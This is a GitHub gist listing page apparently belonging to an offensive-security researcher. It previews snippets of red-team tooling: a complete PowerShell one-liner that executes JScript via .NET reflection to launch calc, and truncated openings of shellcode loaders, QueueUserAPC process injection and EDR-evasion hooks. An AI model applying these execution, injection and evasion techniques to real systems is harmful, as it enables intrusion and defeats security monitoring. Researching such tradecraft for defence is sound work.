Skip to content

Instantly share code, notes, and snippets.

View mgeeky's full-sized avatar
💭
Wanna sip a sencha?

Mariusz Banach mgeeky

💭
Wanna sip a sencha?
2.7k followers · 104 following
  • Binary-Offensive.com
  • Poland
  • X @mariuszbit
View GitHub Profile
@mgeeky
mgeeky / binding.gyp
Created November 21, 2024 20:55 — forked from NickNaso/binding.gyp
N-API register module (the new way)
{
"targets": [
{
"target_name": "hello",
"sources": [ "hello.cc" ]
}
]
}
@mgeeky
mgeeky / ANSI.md
Created November 20, 2024 18:48 — forked from fnky/ANSI.md
ANSI Escape Codes

ANSI Escape Sequences

Standard escape codes are prefixed with Escape:

  • Ctrl-Key: ^[
  • Octal: \033
  • Unicode: \u001b
  • Hexadecimal: \x1B
  • Decimal: 27
@mgeeky
mgeeky / AddVectoredExceptionHandler.cpp
Created October 22, 2024 22:16
Rebuilt RtlAddVectoredExceptionHandler so that it doesn't use the ntdll imported function. This way it would be more difficult than just putting a breakpoint on RtlAddVectoredExceptionHandler to log your function. To make it a little better you could inline EncodePointer which would only a few extra lines. Structs might be documented somewhere h…
#include <Windows.h>
#include <winternl.h>
// Types
using LdrProtectMrdata_t = void(__stdcall*)(int);
using LdrProtectMrdataHeap_t = void(__thiscall*)(int);
struct ExceptionRecord_t {
LIST_ENTRY entry;
int* unknown_intptr;
@mgeeky
mgeeky / ldrloaddll_hook.c
Created October 20, 2024 10:39 — forked from bats3c/ldrloaddll_hook.c
Hook LdrLoadDll to whitelist DLLs being loaded into a process
#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#define dwAllowDllCount 1
CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = {
"W:\\allowed.dll"
};
VOID HookLoadDll(LPVOID lpAddr);
@mgeeky
mgeeky / jscript.ps1
Created October 12, 2024 19:35 — forked from gabemarshall/jscript.ps1
Executing JScript from Powershell via .NET reflection
[Reflection.Assembly]::LoadWithPartialName('Microsoft.JScript');
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'
[Microsoft.JScript.Eval]::JScriptEvaluate($js,[Microsoft.JScript.Vsa.VsaEngine]::CreateEngine());
@mgeeky
mgeeky / shellcode.js
Created October 11, 2024 08:44 — forked from Ridter/shellcode.js
Execute ShellCode Via Jscript.NET
import System;
import System.Runtime.InteropServices;
import System.Reflection;
import System.Reflection.Emit;
import System.Runtime;
import System.Text;
//C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js
@mgeeky
mgeeky / Program.cs
Created August 24, 2024 12:34 — forked from susMdT/Program.cs
haha funny jit go brrrr
using System;
using System.Runtime.CompilerServices;
using System.Reflection;
using System.Reflection.Emit;
namespace FunkyJit
{
class Program
{
public static void Nothing() { Console.WriteLine(); }
static void Main(string[] args)
@mgeeky
mgeeky / vdm_lua_extract.py
Created March 25, 2024 18:54 — forked from HackingLZ/vdm_lua_extract.py
VDM Lua Extractor
### Original script and research by commial
### https://github.com/commial/experiments/tree/master/windows-defender
### Set LUADec_Path to binary
### https://github.com/viruscamp/luadec
import struct
import argparse
import sys
import os
import io
import subprocess
@mgeeky
mgeeky / DInjectQueuerAPC.cs
Created June 27, 2023 22:40 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@mgeeky
mgeeky / Dynamic_PInvoke_Shellcode.cs
Created June 22, 2023 19:19 — forked from bohops/Dynamic_PInvoke_Shellcode.cs
Dynamic_PInvoke_Shellcode.cs
//original runner by @Arno0x: https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs
using System;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
namespace ShellcodeLoader
{
class Program